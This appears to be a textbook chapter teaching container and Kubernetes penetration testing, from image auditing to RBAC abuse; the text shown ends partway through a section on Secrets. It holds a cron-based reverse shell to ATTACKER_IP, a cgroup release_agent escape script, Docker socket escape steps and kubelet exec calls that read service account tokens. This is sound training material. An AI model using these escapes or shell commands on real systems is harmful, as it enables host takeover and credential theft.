Learning Objectives
- Understand container security fundamentals and the threat landscape
- Audit Docker images, registries, and runtime configurations for vulnerabilities
- Execute and defend against container escape techniques
- Map the Kubernetes architecture and identify its attack surface
- Exploit Kubernetes RBAC misconfigurations, Secrets exposure, and API server weaknesses
- Assess supply chain risks in containerized infrastructure
- Apply defensive strategies for hardening container and Kubernetes environments
In This Chapter
- Introduction
- 32.1 Container Security Fundamentals
- 32.2 Docker Security
- 32.3 Container Escape Techniques
- 32.4 Kubernetes Architecture and Attack Surface
- 32.5 Kubernetes Exploitation
- 32.6 Supply Chain Attacks on Container Infrastructure
- 32.7 Tools and Techniques for Container Security Assessment
- 32.8 Hardening Containers and Kubernetes
- 32.9 Cloud-Specific Considerations
- 32.10 Service Mesh Security Considerations
- 32.11 Reporting Container and Kubernetes Findings
- 32.12 Container Security in CI/CD Pipelines
- 32.13 Practical Lab Exercises
- 32.14 Summary
- References
Chapter 32: Container and Kubernetes Security
Introduction
In the span of a decade, containers have transformed from a niche Linux technology into the dominant paradigm for deploying applications at scale. Docker democratized containerization starting in 2013, and Kubernetes—open-sourced by Google in 2014—became the de facto orchestration platform. By 2025, over 90% of organizations reported using containers in production, with Kubernetes adoption exceeding 80% among enterprises running containerized workloads.
This massive adoption has created an equally massive attack surface. Container environments introduce novel security challenges that traditional penetration testing methodologies were not designed to address. Misconfigured Docker daemons have exposed entire cloud environments. Vulnerable Kubernetes dashboards have been leveraged for cryptocurrency mining. Supply chain attacks targeting container images have compromised thousands of organizations simultaneously.
💡 Why This Chapter Matters: As a penetration tester, you will increasingly encounter containerized environments. Understanding how to assess, exploit, and recommend hardening for container and Kubernetes infrastructure is no longer optional—it is a core competency. The organizations you test almost certainly run containers, and the vulnerabilities in these systems can be devastating.
For our running examples, consider these scenarios:
- MedSecure has migrated its electronic health records platform to a microservices architecture running on Kubernetes in AWS EKS. Patient data flows through dozens of containerized services, and a compromise of any one could violate HIPAA.
- ShopStack runs its entire e-commerce platform on Docker containers orchestrated by Kubernetes, with a CI/CD pipeline that builds and pushes images automatically. Their supply chain security is only as strong as their weakest image dependency.
- Student Home Lab can replicate these environments affordably using Minikube, kind (Kubernetes in Docker), and deliberately vulnerable container images for practice.
This chapter provides the methodologies, tools, and techniques you need to assess container and Kubernetes security from an ethical hacking perspective—while always operating within the boundaries of your authorized engagement scope.
The chapter is organized to mirror a realistic assessment workflow. We begin with container fundamentals, then examine Docker-specific security, container escape techniques, Kubernetes architecture and exploitation, supply chain attacks, tooling, hardening, and cloud-specific considerations. By the end, you will have a comprehensive methodology for assessing containerized environments.
32.1 Container Security Fundamentals
32.1.1 What Are Containers?
Containers are lightweight, isolated execution environments that package an application with its dependencies. Unlike virtual machines, containers share the host operating system's kernel, relying on Linux kernel features—primarily namespaces and cgroups—for isolation.
Namespaces provide isolation of system resources:
| Namespace | Isolates |
|---|---|
| PID | Process IDs |
| NET | Network interfaces, routing tables |
| MNT | Filesystem mount points |
| UTS | Hostname and domain name |
| IPC | Inter-process communication resources |
| USER | User and group IDs |
| CGROUP | Cgroup root directory |
Cgroups (control groups) limit and account for resource usage:
- CPU time and allocation
- Memory limits and accounting
- Block I/O bandwidth
- Network bandwidth (via tc integration)
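These boundaries are directly observable: every process's namespace memberships are exposed as symlinks under /proc/&lt;pid&gt;/ns, so you can check what a container shares with its host using read-only commands (Linux only):

```shell
# Each entry is a symlink whose target encodes the namespace type and an
# inode number; two processes in the same namespace see the same inode.
ls -l /proc/self/ns/

# Print individual namespace identifiers
readlink /proc/self/ns/pid
readlink /proc/self/ns/net
readlink /proc/self/ns/mnt
```

Comparing these values between a shell inside a container and a shell on the host quickly reveals which namespaces, if any, are shared.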
⚠️ Critical Security Insight: Containers are NOT virtual machines. They share the host kernel. A kernel exploit inside a container can compromise the host. This fundamental architectural reality underpins most container escape techniques.
32.1.2 The Container Threat Model
The container threat model encompasses several attack vectors that penetration testers must evaluate:
Image-Level Threats:
- Vulnerable base images with known CVEs
- Embedded secrets (API keys, passwords) in image layers
- Malicious images from untrusted registries
- Outdated dependencies baked into images

Build-Level Threats:
- Compromised build pipelines injecting malicious code
- Tampered base images in private registries
- Build-time secret leakage through layer caching

Runtime Threats:
- Container escape to host
- Lateral movement between containers
- Privilege escalation within containers
- Resource abuse (cryptomining)

Orchestration Threats (Kubernetes-specific):
- API server misconfiguration
- RBAC over-permissioning
- Secrets stored in plaintext
- Network policy absence enabling lateral movement
- Service account token abuse

Supply Chain Threats:
- Compromised upstream images
- Dependency confusion in package managers
- Typosquatting in container registries
32.1.3 The Shared Kernel Problem
The most critical security implication of containers is the shared kernel. Every container on a host communicates with the same Linux kernel through system calls. This creates several important consequences:
Kernel Vulnerability Exposure: A vulnerability in the Linux kernel is exploitable from within any container on that host. Unlike virtual machines, where a hypervisor mediates hardware access and each guest has its own kernel, containers have direct (filtered) access to kernel system calls. When a new kernel CVE is announced, every container on every unpatched host is potentially vulnerable.
System Call Surface: Containers make system calls directly to the host kernel. While seccomp profiles can restrict which system calls are allowed, the default Docker seccomp profile still permits over 300 of the approximately 440 available system calls. Each permitted system call is a potential attack vector.
Resource Visibility: Without proper namespace configuration, containers may have visibility into host resources. For example, without PID namespace isolation, a container can see host processes. Without proper cgroup isolation, a container might influence host resource allocation.
Namespace Escape Vectors: Each namespace type provides a specific isolation boundary. Weaknesses in namespace implementation or configuration can provide escape vectors. The user namespace, for instance, has had multiple vulnerabilities that allowed privilege escalation.
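These consequences are easy to verify from inside any container. The following read-only checks (safe on any Linux system) confirm the shared kernel and show what syscall filtering is active for the current process:

```shell
# The kernel version reported inside a container is the HOST kernel;
# there is no separate guest kernel to patch.
uname -r

# Seccomp mode for this process: 0 = disabled, 1 = strict, 2 = filtered
# (2 is what you see under the default Docker profile)
grep '^Seccomp:' /proc/self/status
```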
Consider MedSecure's deployment: their patient-facing web application and their internal billing system both run as containers on the same Kubernetes node. If an attacker compromises the web application container and exploits a kernel vulnerability, they gain access to the host and, by extension, the billing container with its financial data. This is fundamentally different from a traditional deployment where the web server and billing system might run on separate physical servers.
📊 Container Escape CVE History: Between 2019 and 2025, over 30 container escape CVEs were published, affecting runc, containerd, Docker, and related components. Notable examples include CVE-2019-5736 (runc overwrite), CVE-2020-15257 (containerd shim), CVE-2022-0185 (filesystem context overflow), and CVE-2024-21626 (runc working directory). Keeping track of these CVEs is essential for effective container security assessment.
32.1.4 Container Security vs. Traditional Security
Penetration testers accustomed to traditional infrastructure assessments must adapt their methodology for containerized environments:
| Traditional | Container |
|---|---|
| Persistent servers | Ephemeral containers |
| Manual patching | Immutable images rebuilt from base |
| Host-level firewall rules | Network policies and service mesh |
| SSH access for administration | kubectl exec, container runtime APIs |
| Static IP addresses | Dynamic service discovery |
| Monolithic applications | Microservices with inter-service communication |
| Centralized logging | Distributed logging across pods |
🔵 Blue Team Perspective: Defenders should recognize that container security requires a shift-left approach. Security must be integrated into the CI/CD pipeline—scanning images before deployment, enforcing admission policies, and continuously monitoring runtime behavior. Waiting to secure containers in production is too late.
32.2 Docker Security
32.2.1 Docker Architecture and Attack Surface
Docker uses a client-server architecture. The Docker daemon (dockerd) runs as root on the host and manages containers, images, networks, and volumes. The Docker client communicates with the daemon via a Unix socket (/var/run/docker.sock) or over TCP. Understanding this architecture is essential because the daemon's root-level access means that anyone who can communicate with the daemon effectively has root access to the host.
The Docker daemon handles all container lifecycle operations: pulling images from registries, creating containers from images, starting and stopping containers, managing networking between containers, and handling storage volumes. It also exposes a RESTful API that can be accessed directly via HTTP, which is the same API the Docker CLI uses. This API is the primary target for many Docker-specific attacks.
When Docker is used as the container runtime in Kubernetes, the relationship becomes more complex. The kubelet on each node communicates with the Docker daemon (or containerd/CRI-O) to manage containers. Kubernetes adds its own layer of orchestration, including the API server, scheduler, and controller manager, each adding to the overall attack surface.
The attack surface includes:
- Docker Daemon Socket — If accessible, provides full control over all containers and the host
- Docker API — When exposed over TCP without TLS, enables remote exploitation
- Docker Images — May contain vulnerabilities, malware, or secrets
- Docker Registries — Can be compromised to serve malicious images
- Container Runtime — Responsible for actual container execution; vulnerabilities here enable escapes
- Docker Compose / Swarm — Orchestration adds additional configuration complexity
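The "Docker API exposed over TCP" item can be tested early in reconnaissance by probing the default plaintext port, 2375. A minimal sketch (the target address is a hypothetical in-scope host):

```shell
# probe_docker_api HOST: report whether the Docker Engine API answers
# unauthenticated on the default plaintext TCP port 2375
probe_docker_api() {
  if curl -s -m 3 "http://$1:2375/version" | grep -q '"ApiVersion"'; then
    echo "$1: Docker API EXPOSED (unauthenticated)"
  else
    echo "$1: not reachable or protected"
  fi
}

probe_docker_api 10.0.0.5   # hypothetical in-scope target
```

If the API answers, every daemon operation is available remotely, which is effectively root on the host.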
32.2.2 Auditing Docker Images
Image security assessment is the first line of defense. As a penetration tester, you should evaluate images for:
Scanning for Known Vulnerabilities:
# Using Trivy to scan an image
trivy image nginx:latest
# Scan with severity filter
trivy image --severity HIGH,CRITICAL medsecure/patient-api:v2.1
# Scan a local Dockerfile
trivy config Dockerfile
# Using Grype for vulnerability scanning
grype medsecure/patient-api:v2.1
Inspecting Image Layers for Secrets:
# Pull and save the image
docker save medsecure/patient-api:v2.1 -o patient-api.tar
# Extract and examine layers
mkdir image-layers && cd image-layers
tar xf ../patient-api.tar
# Search for secrets in all layers
for layer in */layer.tar; do
  echo "=== Examining $layer ==="
  tar tf "$layer" | grep -iE '(\.env|\.pem|\.key|password|secret|credential|token)'
done
# Use dive to interactively explore image layers
dive medsecure/patient-api:v2.1
⚠️ Common Finding: Developers frequently add secrets to an image in one layer and remove them in a subsequent layer, believing this hides them. Because Docker images are composed of additive layers, the secret remains accessible in the earlier layer. Always inspect ALL layers, not just the final filesystem.
Dockerfile Best Practices Audit:
When reviewing Dockerfiles, check for these security issues:
# BAD: Running as root (default if not specified)
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3
COPY app.py /app/
CMD ["python3", "/app/app.py"]
# BETTER: Minimal base image, dedicated non-root user
FROM python:3.11-slim
RUN groupadd -r appuser && useradd -r -g appuser appuser
COPY --chown=appuser:appuser app.py /app/
USER appuser
CMD ["python3", "/app/app.py"]
Key Dockerfile security checks:
- Is a non-root USER specified?
- Is the base image pinned to a digest (not just a tag)?
- Are multi-stage builds used to minimize final image size?
- Are secrets passed via build args (which persist in image history)?
- Are unnecessary packages installed?
- Is --no-cache-dir used for pip installs?
- Are any debugging tools included (strace, tcpdump, netcat) that aid post-exploitation?
- Is the COPY command scoped narrowly, or does it copy the entire build context?
- Is a .dockerignore file used to prevent sensitive files from being included?
- Are HEALTHCHECK instructions defined for orchestration integration?
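Several of these checks can be automated with a few greps. The sketch below audits a sample Dockerfile written to a temporary path (hypothetical content; for real engagements a dedicated linter such as hadolint is far more thorough):

```shell
# Write a deliberately bad sample Dockerfile to audit
f=$(mktemp)
cat > "$f" <<'EOF'
FROM node:18
COPY . .
ENV API_KEY=sk_live_example
EOF

# Checks mirroring the audit list above
grep -q  '^USER '           "$f" || echo "FINDING: no USER directive (runs as root)"
grep -Eq '^FROM .*@sha256:' "$f" || echo "FINDING: base image not pinned to a digest"
grep -Eq '^COPY \. '        "$f" && echo "FINDING: copies the entire build context"
grep -Eq '^(ENV|ARG) .*(KEY|SECRET|PASS|TOKEN)' "$f" && echo "FINDING: possible secret in ENV/ARG"
rm -f "$f"
```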
Example: ShopStack Dockerfile Audit Finding
During ShopStack's penetration test, the team discovered the following in a production Dockerfile:
FROM node:18
WORKDIR /app
COPY . .
RUN npm install
ENV STRIPE_SECRET_KEY=sk_live_51Abc...
ENV DATABASE_URL=postgresql://admin:P@ssw0rd@db.internal:5432/shopstack
EXPOSE 3000
CMD ["node", "server.js"]
This Dockerfile contained six critical issues:
- Running as root (no USER directive)
- Unpinned base image tag (`:18` could change)
- Copying entire build context (likely including `.git` and `.env`)
- Production secrets hardcoded as ENV variables
- No `.dockerignore` to exclude sensitive files
- No multi-stage build to minimize image size and attack surface
The hardcoded Stripe secret key was recoverable from any of the image's layers, even after the team attempted to "fix" it by removing the ENV line in a later Dockerfile revision. This finding was rated Critical because it exposed payment processing credentials to anyone with access to the container registry.
32.2.3 Docker Registry Security
Private registries store an organization's container images and represent a high-value target:
# Check if a registry allows anonymous access
curl -s https://registry.medsecure.local/v2/_catalog
# List tags for a repository
curl -s https://registry.medsecure.local/v2/patient-api/tags/list
# Pull manifest to examine image configuration
curl -s https://registry.medsecure.local/v2/patient-api/manifests/latest \
-H "Accept: application/vnd.docker.distribution.manifest.v2+json"
# Download and inspect individual layers
curl -s https://registry.medsecure.local/v2/patient-api/blobs/sha256:<digest> \
-o layer.tar.gz
Common Registry Misconfigurations:
- Anonymous read access enabled
- Anonymous push access (allowing image replacement)
- No content trust / image signing enforcement
- Registry exposed to the internet without authentication
- Use of HTTP instead of HTTPS
- Missing vulnerability scanning integration

📊 Assessment Checklist — Docker Registry:
- [ ] Authentication required for pull operations
- [ ] Authentication required for push operations
- [ ] TLS enabled and properly configured
- [ ] Content trust / Notary signing enforced
- [ ] Vulnerability scanning integrated into push pipeline
- [ ] Access logging enabled
- [ ] Network access restricted to authorized clients
32.2.4 Docker Runtime Security
Runtime security assessment focuses on how containers are configured and executed:
Checking Docker Daemon Configuration:
# Inspect daemon configuration
docker info
docker system info --format '{{json .SecurityOptions}}'
# Check if Docker socket is mounted in any container
docker ps -q | xargs -I {} docker inspect {} \
--format '{{.Name}} {{range .Mounts}}{{.Source}} {{end}}' \
| grep docker.sock
# Check for privileged containers
docker ps -q | xargs -I {} docker inspect {} \
--format '{{.Name}} Privileged:{{.HostConfig.Privileged}}'
# Check for containers with dangerous capabilities
docker ps -q | xargs -I {} docker inspect {} \
--format '{{.Name}} CapAdd:{{.HostConfig.CapAdd}}'
Docker Bench Security:
Docker Bench for Security is an automated script that checks dozens of common Docker security misconfigurations:
# Run Docker Bench Security
docker run --rm --net host --pid host --userns host --cap-add audit_control \
-e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
-v /var/lib:/var/lib:ro \
-v /var/run/docker.sock:/var/run/docker.sock:ro \
-v /usr/lib/systemd:/usr/lib/systemd:ro \
-v /etc:/etc:ro \
docker/docker-bench-security
Dangerous Docker Run Flags:
As a penetration tester, these flags indicate potential exploitation paths:
| Flag | Risk | Impact |
|---|---|---|
| `--privileged` | Container has full host capabilities | Direct host escape |
| `-v /:/host` | Host root filesystem mounted | Full host access |
| `--pid=host` | Shares host PID namespace | Can see/signal host processes |
| `--net=host` | Shares host network namespace | No network isolation |
| `--cap-add SYS_ADMIN` | Adds administrative capabilities | Many escape techniques |
| `-v /var/run/docker.sock:/var/run/docker.sock` | Docker socket access | Can control Docker daemon |
32.3 Container Escape Techniques
Container escapes represent some of the most impactful findings in a penetration test. When a tester can break out of a container and access the underlying host, the entire container infrastructure is at risk. A successful container escape typically means the attacker gains root access on the host, which in a Kubernetes environment translates to access to every container on that node, the kubelet credentials, and potentially the entire cluster.
The severity of a container escape depends on the environment. In a dedicated host with a single application, the impact is limited to that host. In a multi-tenant Kubernetes cluster—like those used by cloud providers for managed container services—an escape could compromise all tenants sharing the same node. The Azurescape vulnerability discussed in Case Study 2 demonstrated this catastrophic scenario in a real cloud environment.
⚖️ Legal and Ethical Reminder: Container escape testing should only be performed within your authorized scope. Escaping a container in a shared cloud environment could inadvertently affect other tenants. Always confirm with your client that escape testing is in scope, and use isolated test environments when possible.
32.3.1 Escaping Privileged Containers
Privileged containers (--privileged) disable almost all containment. They can access host devices, bypass AppArmor/SELinux, and mount host filesystems:
# Inside a privileged container — mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Access host files
cat /mnt/host/etc/shadow
# Write a cron job for reverse shell on host
echo '* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' \
>> /mnt/host/etc/crontab
# Alternative: use nsenter to enter host namespaces
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
32.3.2 Docker Socket Escape
When the Docker socket is mounted inside a container, the container can communicate directly with the Docker daemon and create new containers with arbitrary configurations:
# Verify Docker socket is available
ls -la /var/run/docker.sock
# Install Docker CLI inside the container (or use curl)
# Using curl to interact with Docker API:
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | python3 -m json.tool
# Create a new privileged container mounting the host root
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create \
-H "Content-Type: application/json" \
-d '{
"Image": "alpine",
"Cmd": ["/bin/sh"],
"Tty": true,
"HostConfig": {
"Binds": ["/:/host"],
"Privileged": true
}
}'
# Start the container (substitute the Id returned by the create call)
curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/<container_id>/start
# Exec into it (Docker CLI shown for brevity); chrooting into the bind
# mount yields a root shell on the host filesystem
docker exec -it <container_id> chroot /host /bin/sh
💡 Testing Tip: In MedSecure's environment, the development team mounted the Docker socket into a monitoring container for convenience. This single misconfiguration provided a path from an initial web application compromise to full host access, bypassing all container isolation.
32.3.3 Kernel Exploitation
Since containers share the host kernel, kernel vulnerabilities can be exploited from within a container:
CVE-2022-0185 — Filesystem Context Heap Overflow:
This vulnerability in the Linux kernel's filesystem context handling allowed an attacker with CAP_SYS_ADMIN (available in some container configurations) to escape to the host.
CVE-2022-0847 (Dirty Pipe): A kernel vulnerability allowing arbitrary write to read-only files, exploitable from within containers to overwrite host files.
# Check kernel version from inside container
uname -r
# Compare against known vulnerable versions
# Research: https://www.cvedetails.com/ for kernel CVEs
32.3.4 cgroup Escape (CVE-2022-0492)
The release_agent cgroup escape leverages a misconfiguration where a container can write to the host's cgroup release_agent file:
# Check if cgroup v1 is in use and writable
mount | grep cgroup
# Create a cgroup and set release_agent
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/escape
# Set up the escape
echo 1 > /tmp/cgrp/escape/notify_on_release
# Get container's path on host filesystem
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write command to execute on host
echo '#!/bin/sh' > /cmd
echo "cat /etc/hostname > $host_path/output" >> /cmd
chmod a+x /cmd
# Trigger the escape
sh -c "echo \$\$ > /tmp/cgrp/escape/cgroup.procs"
# Read the output
cat /output
32.3.5 Detecting Container Escape Opportunities
During a penetration test, systematically check for escape vectors:
# Am I in a container?
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "Docker container"
[ -f /.dockerenv ] && echo "Docker container"
cat /proc/1/cgroup 2>/dev/null | grep -qi kubepods && echo "Kubernetes pod"
# Check for privileged mode
ip link add dummy0 type dummy 2>/dev/null && echo "Likely privileged" && ip link delete dummy0
# Check for Docker socket
ls -la /var/run/docker.sock 2>/dev/null
# Check capabilities
cat /proc/self/status | grep CapEff
# Decode with: capsh --decode=<hex_value>
# Check for sensitive mounts
mount | grep -E '(docker|kube|/etc|/var)'
# Check for service account tokens (Kubernetes)
ls -la /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null
# Check AppArmor/SELinux status
cat /proc/self/attr/current 2>/dev/null
🔵 Blue Team Perspective: Defend against container escapes by: (1) never running privileged containers in production, (2) using read-only root filesystems, (3) dropping all unnecessary capabilities, (4) enabling seccomp profiles, (5) enforcing AppArmor or SELinux policies, (6) keeping the host kernel patched, and (7) using gVisor or Kata Containers for additional isolation layers.
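Most of these runtime defenses map directly onto a pod's securityContext. A hardened baseline might look like the following (a sketch using standard Kubernetes fields; the image name is from the running example):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: hardened-example
spec:
  securityContext:
    runAsNonRoot: true            # refuse to start if the image runs as UID 0
  containers:
  - name: app
    image: medsecure/patient-api:v2.1
    securityContext:
      allowPrivilegeEscalation: false   # blocks setuid/sudo escalation
      readOnlyRootFilesystem: true      # container cannot modify its own rootfs
      capabilities:
        drop: ["ALL"]                   # re-add only what the app truly needs
      seccompProfile:
        type: RuntimeDefault            # enable the runtime's default syscall filter
```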
32.3.6 Practical Container Escape Methodology
When conducting a container security assessment, follow this systematic approach to evaluate escape potential:
Step 1: Environment Identification. Determine the container runtime, kernel version, and isolation mechanisms in use. This context determines which escape techniques are applicable.
Step 2: Privilege Assessment. Check for privileged mode, dangerous capabilities, and namespace sharing. These are the most common and easiest escape vectors.
Step 3: Mount Analysis. Enumerate all mounted volumes, looking for Docker sockets, host paths, and sensitive filesystems. Mounted sockets provide the most reliable escape path.
Step 4: Kernel CVE Cross-Reference. Compare the host kernel version against known CVEs. If the kernel is outdated, kernel-level escapes may be possible even without misconfigurations.
Step 5: Network Assessment. From within the container, probe for access to the host network, cloud metadata services, and other containers. Even without a full escape, network access to sensitive services may be sufficient to achieve assessment objectives.
Step 6: Documentation. Document every finding with exact commands, outputs, and potential impact. For each escape vector identified, note whether it was actually exploitable or merely theoretically possible given the configuration.
💡 Assessment Tip: Not every container assessment requires an actual escape. Identifying the misconfiguration (e.g., privileged mode, mounted socket) and documenting the potential impact is often sufficient for a penetration test report. Actually performing the escape is important for proof-of-concept but should be done carefully to avoid disrupting production systems. Always discuss with the client before attempting escape techniques that could affect host stability.
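The first steps of this methodology can be bundled into a small triage script, a sketch of the read-only checks from 32.3.5 that is safe to run in any pod or container:

```shell
#!/bin/sh
# container_triage.sh: quick, read-only survey of common escape indicators
echo "[*] Runtime indicators:"
if [ -f /.dockerenv ]; then echo "    - /.dockerenv present (Docker)"; fi
if grep -qi kubepods /proc/1/cgroup 2>/dev/null; then
  echo "    - kubepods cgroup (Kubernetes pod)"
fi

echo "[*] Kernel: $(uname -r)"
echo "[*] Effective capabilities: $(grep '^CapEff:' /proc/self/status | awk '{print $2}')"

echo "[*] Dangerous mounts and tokens:"
if [ -S /var/run/docker.sock ]; then echo "    - Docker socket mounted!"; fi
if [ -d /var/run/secrets/kubernetes.io/serviceaccount ]; then
  echo "    - Kubernetes service account token present"
fi
echo "[*] Triage complete"
```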
32.4 Kubernetes Architecture and Attack Surface
32.4.1 Kubernetes Components
Understanding Kubernetes architecture is essential for effective security assessment. Kubernetes follows a master-worker architecture:
Control Plane Components:
- kube-apiserver — The central management point. All operations go through the API server. Compromise of the API server means full cluster control.
- etcd — Distributed key-value store holding all cluster state, including Secrets. Directly accessing etcd bypasses all RBAC controls.
- kube-scheduler — Assigns pods to nodes. Manipulation could force workloads onto compromised nodes.
- kube-controller-manager — Runs controllers that regulate cluster state. Compromise enables persistent cluster manipulation.
- cloud-controller-manager — Interfaces with cloud provider APIs. Compromise may enable cloud account pivoting.
Worker Node Components:
- kubelet — Agent running on each node that manages pods. The kubelet API (port 10250) is a frequent attack target.
- kube-proxy — Manages network rules for service routing.
- Container Runtime — Docker, containerd, or CRI-O actually runs the containers.
Additional Components:
- CoreDNS — Cluster DNS for service discovery
- Ingress Controllers — Handle external HTTP/HTTPS traffic routing
- Service Mesh (Istio, Linkerd) — Manages inter-service communication
- Dashboard — Web UI for cluster management (frequently misconfigured)
32.4.2 Kubernetes Attack Surface Map
EXTERNAL
|
[Ingress Controller] --- Web-facing vulns
|
[API Server] --- AuthN/AuthZ bypass
/ | \
[etcd] [Scheduler] [Controller Manager]
| | |
Raw secrets Pod placement Cluster state
[Node 1] [Node 2] [Node 3]
/ | \ / | \ / | \
[kubelet][proxy][pods] [kubelet][proxy][pods] [kubelet]...
| |
Port 10250 Port 10250
(API target) (API target)
32.4.3 Common Kubernetes Attack Paths
Based on real-world penetration tests and incidents, these are the most frequently exploited attack paths:
Path 1: Exposed Dashboard / API Server
Internet → Exposed K8s Dashboard (no auth) → Create privileged pod → Container escape → Node compromise → Cluster takeover
Path 2: Compromised Pod to Cluster
Web app exploit → Pod shell → Service account token → API server enumeration → RBAC escalation → Secrets extraction → Lateral movement
Path 3: Supply Chain
Compromised CI/CD → Malicious image push → Deployment picks up new image → Code execution in cluster → Pivot to internal services
Path 4: Kubelet API
Network access to node → Unauthenticated kubelet API → List pods → Exec into any pod → Extract secrets → Pivot
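Path 4 can be tested with two requests against the node. A sketch (the node address is a hypothetical in-scope target, and the namespace/pod/container names are from the running example; the legacy read and exec endpoints shown are the classic checks for an unauthenticated kubelet):

```shell
NODE_IP=10.0.1.20   # hypothetical in-scope node address

# List every pod running on the node (works unauthenticated if misconfigured)
curl -sk -m 3 "https://$NODE_IP:10250/pods" || echo "[-] kubelet not reachable"

# If /pods answers, the run endpoint gives command execution in any pod:
#   POST /run/<namespace>/<pod>/<container>  with  cmd=<command>
curl -sk -m 3 -X POST \
  "https://$NODE_IP:10250/run/medsecure-production/patient-api/app" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token" \
  || echo "[-] kubelet exec not reachable"
```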
📊 Attack Path Probability (from aggregated pen test data):
- Misconfigured RBAC: ~45% of engagements
- Secrets in plaintext: ~60% of engagements
- Missing network policies: ~70% of engagements
- Exposed kubelet API: ~15% of engagements
- Container escape possible: ~10% of engagements
32.5 Kubernetes Exploitation
Kubernetes exploitation represents a distinct skill set within container security assessment. While Docker security focuses on individual container isolation, Kubernetes exploitation involves understanding a distributed system's authorization model, service discovery mechanisms, and the trust relationships between components. Mastering Kubernetes exploitation requires thinking in terms of service accounts, RBAC policies, and cluster-wide resources rather than individual user accounts and file permissions.
The exploitation techniques in this section follow a logical progression: gaining initial access to a pod, enumerating the Kubernetes environment, escalating privileges through RBAC misconfigurations, extracting secrets, accessing the API server, moving laterally between services, and exploiting the kubelet API for node-level access.
32.5.1 Enumerating Kubernetes from Inside a Pod
When you gain access to a pod (through a web application vulnerability, for example), your first step is to understand the Kubernetes environment:
# Confirm we're in Kubernetes
env | grep KUBERNETES
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Read the service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
# Query the API server
APISERVER=https://kubernetes.default.svc
# Check our permissions
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
-X POST -H "Content-Type: application/json" \
-d '{
"apiVersion": "authorization.k8s.io/v1",
"kind": "SelfSubjectAccessReview",
"spec": {
"resourceAttributes": {
"verb": "list",
"resource": "secrets",
"namespace": "'"$NAMESPACE"'"
}
}
}'
# List pods in our namespace
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$NAMESPACE/pods
# Attempt to list all namespaces
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces
# Attempt to list secrets
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$NAMESPACE/secrets
32.5.2 RBAC Exploitation
Kubernetes Role-Based Access Control (RBAC) defines what actions principals can perform. Misconfigurations are extremely common:
Understanding RBAC Components:
- ServiceAccount — Identity for pods
- Role / ClusterRole — Defines permissions (verbs on resources)
- RoleBinding / ClusterRoleBinding — Associates roles with subjects
Common RBAC Misconfigurations:
# DANGEROUS: Wildcard permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: too-permissive
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
---
# DANGEROUS: Service account bound to cluster-admin
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: dev-admin-binding
subjects:
- kind: ServiceAccount
  name: default
  namespace: development
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
RBAC Enumeration with kubectl (if available):
# Check what we can do
kubectl auth can-i --list
# Check specific permissions
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create pods --subresource=exec
# Enumerate roles and bindings
kubectl get roles,clusterroles,rolebindings,clusterrolebindings -A
# Look for overprivileged service accounts
kubectl get clusterrolebindings -o json | \
jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects'
RBAC Escalation Techniques:
If your service account can create pods, you can escalate by creating a pod with a more privileged service account:
# Create a pod using a privileged service account
apiVersion: v1
kind: Pod
metadata:
  name: escalation-pod
  namespace: kube-system
spec:
  serviceAccountName: clusterrole-aggregation-controller
  automountServiceAccountToken: true
  containers:
  - name: pwned
    image: alpine
    command: ["/bin/sh", "-c", "sleep 3600"]
32.5.3 Secrets Exploitation
Kubernetes Secrets are base64-encoded (NOT encrypted) by default. This is one of the most commonly misunderstood aspects of Kubernetes security:
# List secrets in a namespace
kubectl get secrets -n medsecure-production
# Read a secret (output is base64-encoded)
kubectl get secret database-credentials -n medsecure-production -o json
# Decode the secret
kubectl get secret database-credentials -n medsecure-production \
-o jsonpath='{.data.password}' | base64 -d
# Find all secrets across the cluster (if permitted)
kubectl get secrets -A -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, keys: (.data | keys)}'
# Check environment variables in running pods for injected secrets
kubectl get pods -n medsecure-production -o json | \
jq '.items[].spec.containers[].env[]? | select(.valueFrom.secretKeyRef)'
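The point that base64 is an encoding, not encryption, is easy to demonstrate locally: anyone holding the encoded value recovers the plaintext with no key at all (the secret value below is made up):

```shell
# A made-up secret value; base64 round-trips it losslessly with no key
plaintext='P@ssw0rd123'
encoded=$(printf '%s' "$plaintext" | base64)
decoded=$(printf '%s' "$encoded" | base64 -d)

echo "encoded: $encoded"   # this string is all that "protects" a default Secret
echo "decoded: $decoded"
[ "$decoded" = "$plaintext" ] && echo "round-trip OK"
```

This is why encryption at rest in etcd and tight RBAC on `get secrets` matter: the encoding itself provides zero confidentiality.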
